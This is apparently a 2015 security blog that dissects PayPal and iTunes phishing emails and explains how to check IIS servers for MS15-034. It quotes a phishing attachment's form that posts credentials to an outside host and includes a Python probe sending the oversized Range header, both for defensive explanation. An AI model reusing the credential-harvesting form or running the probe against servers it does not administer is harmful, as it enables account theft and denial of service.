Sunday, June 21, 2015

Phishing Email - Your PayPal Confirmation Alert ✓

Just got hit with the "Your PayPal Confirmation Alert  ✓" phishing email.

This email is crafty: the message body and the email headers are composed well and all the sources seem to come from PayPal, but the real threat is the attached document, which it asks you to fill out.

This email will try to steal your PayPal identity and also carries a browser-hijack file.


The email subject line:

"Your PayPal Confirmation Alert  ✓"


The email reads as follows; the giveaway is the misspelling of "Thank you".



PayPal
Dear Customer,
This is an automatic message by the system to let you know that you have to confirm your account information within 48 hours.
Your account has been frozen temporarily in order to protect it.
The account will continue to be frozen until it is approved and validate your account information.
This will help protect you in the future. The process does not take more than 3 minutes.
To proceed to confirm your account information please follow the instructions that will be required
  1. Download the attached document and open it in a browser window secure.
  2. Confirm that you are the account holder and follow the instructions.


Tank You,
PayPal



The attached document is named PayPal-Alert.htm and contains a form that sends all the personal information you enter to this URL:


<form action="http://www.youyourk.com/id.php" id="main" method="POST" name="main">



Action > Report the phishing URL to Google now by clicking this link:
  1. https://www.google.com/safebrowsing/report_phish/?hl=en&url=www.youyourk.com


The attached document, cleansed preview (form field labels only):

PayPal ID and Password
Enter your primary email address as your Paypal ID.
Please enter your information.

Mailing Address
Please enter your mailing address.

Profile of credit card



Friday, May 22, 2015

Phishing Email - You sent a iTunes Gift Card $50

Recently the "You sent a iTunes Gift Card $50 CAD" email has come in many flavors, and if it matches the items below, there is a good chance it is a phishing email. I'll walk you through how to tell for sure. This crafty email has been making its way through the spam filters of the big three email providers (Google/Outlook/Yahoo).

What to do?
Report them: hover over the "Click here To Cancel This Transaction" link in your email, match the URL against the list below, and click the matching link to report it as phishing to Google.

Report Phishing URLs at Google now

If you have received this email, take further action now by clicking these links:

  1. https://www.google.com/safebrowsing/report_phish/?hl=en&url=youtubewom.com

You sent a iTunes Gift Card $50 CAD to (slowdawn12@msn.co.ok) Thanks for using iTunes. To see all the transaction details, log in to your Apple account. (Order Number:115757250)

22 May 2015 02:01:11 BST

Transaction ID: 4V929066CK353413N
You sent a iTunes Gift Card $50 CAD to (slowdawn12@msn.co.ok)
Thanks for using iTunes. To see all the transaction details, log in to your Apple account.


Seller
eBay Checkout
Note to seller
iTunes Code (Email Delivery)
Address Email - NO confirmed


Dispatch details
The seller hasnt provided any dispatch details yet.


Description                               Unit price   Qty   Amount
Click here To Cancel This Transaction
iTunes Gift Card Number 331027592910      $50 CAD      1     $50 CAD
Postage and packaging                                        50 CAD
Insurance - not offered                   --           --    --
Total                                                        $50 CAD






How to tell this is a phishing email?


  1. If the email is from you to you, then it's phishing.
  2. Hover over every link in the email; if it does not point to the apple.com site, then forget it.

    In the above example, all the links and source images seem to be from the Apple website except the "Click here To Cancel This Transaction" link.

    You can test this in the above example, since I crafted it from the source HTML of the phishing email. Try it: hover over the links to examine the source URL. Note: I have re-coded "Click here To Cancel This Transaction" to report youtubewom.com as a phishing site to Google.

    In the original phishing email, hovering over Click here To Cancel This Transaction pointed to spam site youtubeworm.com. 


    Reading email in Outlook 2013 generated pop-up "Click to follow link"
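The two checks above (a message sent from you to you, and links that do not point at the brand's own domain) and the PayPal post's warning about an HTML attachment whose form posts elsewhere can all be run in code over a saved message. The script below is an added example, not code from this blog: it parses a raw message with Python's standard email module, collects every link and form action from the HTML body and from HTML attachments, and reports anything not on a trusted domain. The sample message, the victim address and the trusted-domain list are constructed; the two hostnames youtubewom.com and www.youyourk.com are the ones quoted in the posts.

```python
"""Triage a saved phishing email with the checks described in the two posts.

Added example (not code from the original blog). Applies three rules:
  1. "from you to you": From and To carry the same address,
  2. every <a href> in the HTML body should point at a trusted domain,
  3. any HTML attachment carrying a <form> must post to a trusted domain too.
"""
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse


class LinkExtractor(HTMLParser):
    """Collects href targets of <a> tags and action targets of <form> tags."""

    def __init__(self):
        super().__init__()
        self.links = []  # list of (tag, url)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href"):
            self.links.append(("a", attrs["href"]))
        elif tag == "form" and attrs.get("action"):
            self.links.append(("form", attrs["action"]))


def hostname_of(url):
    """Lower-cased host of an http(s) URL; None for mailto:, javascript:, etc."""
    parsed = urlparse(url.strip())
    if parsed.scheme not in ("http", "https"):
        return None
    return (parsed.hostname or "").lower()


def host_is_trusted(host, trusted_domains):
    """True if host is a trusted domain or a subdomain of one (no suffix tricks)."""
    return any(host == d or host.endswith("." + d) for d in trusted_domains)


def triage(raw_message, trusted_domains):
    """Return human-readable findings; an empty list means no rule fired."""
    msg = message_from_string(raw_message)
    findings = []

    sender = parseaddr(msg.get("From", ""))[1].lower()
    recipient = parseaddr(msg.get("To", ""))[1].lower()
    if sender and sender == recipient:
        findings.append(f"from-you-to-you: {sender}")

    # walk() visits the HTML body and HTML attachments alike
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        where = part.get_filename() or "body"
        extractor = LinkExtractor()
        extractor.feed(part.get_payload(decode=True).decode("utf-8", "replace"))
        for tag, url in extractor.links:
            host = hostname_of(url)
            if host is None or host_is_trusted(host, trusted_domains):
                continue
            findings.append(f"untrusted {tag} target in {where}: {host}")
    return findings


# Constructed sample: an Apple-themed body plus a PayPal-style HTML attachment.
SAMPLE_EMAIL = """\
From: victim@example.com
To: victim@example.com
Subject: You sent a iTunes Gift Card $50 CAD
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<html><body>
<p>To see all the transaction details, <a href="https://www.apple.com/">log in</a>.</p>
<p><a href="http://youtubewom.com/cancel.php">Click here To Cancel This Transaction</a></p>
</body></html>
--b1
Content-Type: text/html; name="PayPal-Alert.htm"
Content-Disposition: attachment; filename="PayPal-Alert.htm"

<html><body>
<form action="http://www.youyourk.com/id.php" id="main" method="POST" name="main">
<input name="email"><input name="password" type="password">
</form></body></html>
--b1--
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_EMAIL, {"apple.com", "paypal.com"}):
        print(finding)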

Report Phishing URLs at Google now 

If you have received this email, take further action now by clicking the link below. Hover over the "Click here To Cancel This Transaction" link, match the URL, and click the matching link to report it as phishing to Google.

  1. https://www.google.com/safebrowsing/report_phish/?hl=en&url=youtubewom.com

If you don't see your URL here add a comment below.

Report phishing at Microsoft and government agencies

  1. http://www.microsoft.com/security/online-privacy/phishing-faq.aspx

Thursday, April 16, 2015

How to test for the Critical Microsoft IIS Vulnerability (MS15-034) that Allows Remote Code Execution

Critical Microsoft IIS Vulnerability (MS15-034), released April 14, 2015

It is a vulnerability in HTTP.sys that could allow remote code execution on unpatched IIS, on all affected Windows x64 systems.

Full details are in the security bulletin provided by Microsoft at https://technet.microsoft.com/library/security/MS15-034

This vulnerability can allow a remote, unauthenticated denial of service (DoS) and possibly remote code execution (RCE). An attacker exploits it by sending a specially crafted HTTP request carrying the right header.

To identify whether your Windows server is vulnerable, run the following command from a Unix/Linux/Mac bash shell. Substitute your Windows machine's IP address for SERVER_IP.

If you get the following response then it's vulnerable:

In fact, if any part of the response contains "Requested Range Not Satisfiable" then you are vulnerable, whether it appears in the status line as HTTP/1.1 416 Requested Range Not Satisfiable or wrapped in HTML tags.
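The decision rule in the paragraph above can be scripted so that you can sweep your own servers rather than eyeballing one response at a time. The following is an added example, not the command from the original post: it builds the raw request, sends it to one host, and classifies the reply by the "Requested Range Not Satisfiable" rule, whether the phrase sits in the status line or inside HTML. The Range header value it sends (bytes=0-18446744073709551615) is the widely published probe for this bulletin and is supplied here as an assumption, since the post's own command did not survive; the three sample responses are constructed.

```python
"""Classify a server's reply to the MS15-034 probe by the rule stated above.

Added example, not the original post's command. The probe header value is an
assumption (the widely published check for this bulletin, not from the page).
"""
import socket
import sys

SIGNATURE = "Requested Range Not Satisfiable"
PROBE_RANGE = "bytes=0-18446744073709551615"  # assumed probe value, see lead-in


def classify_response(response):
    """'vulnerable' if the signature appears anywhere, 'no-signature' otherwise.

    'no-signature' means patched, not IIS/HTTP.sys, or the probe did not reach
    a path the kernel cache serves; it is not by itself proof of being patched.
    """
    if not response or not response.strip():
        return "no-response"
    if SIGNATURE.lower() in response.lower():
        return "vulnerable"
    return "no-signature"


def build_probe(host, path="/"):
    """Raw HTTP/1.1 request carrying the oversized Range header."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Range: {PROBE_RANGE}\r\n"
        "Connection: close\r\n\r\n"
    )


def probe_server(host, port=80, path="/", timeout=5.0):
    """Send the probe to a server you administer and classify its reply."""
    request = build_probe(host, path).encode("ascii")
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(request)
            chunks = []
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
    except OSError:
        return "no-response"
    return classify_response(b"".join(chunks).decode("latin-1", "replace"))


# Constructed sample responses covering the cases the post describes.
VULNERABLE_STATUS_LINE = (
    "HTTP/1.1 416 Requested Range Not Satisfiable\r\n"
    "Content-Type: text/html\r\nContent-Length: 0\r\n\r\n"
)
VULNERABLE_IN_HTML = (
    "HTTP/1.1 416 \r\nContent-Type: text/html\r\n\r\n"
    "<html><body><h1>Requested Range Not Satisfiable</h1></body></html>"
)
NO_SIGNATURE = "HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "SERVER_IP"
    print(target, probe_server(target))
```

Run it as `python3 ms15034_check.py SERVER_IP` against a host you own; a "vulnerable" verdict means patch now, and "no-signature" on a known-unpatched box usually means the path you probed is not served from the kernel cache, so try a static file.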


The temporary workaround stated in the bulletin is to "Disable IIS kernel caching" in IIS until you get patched; the bulletin notes this may cost you performance, so treat it as a stopgap.

Play safe my friends.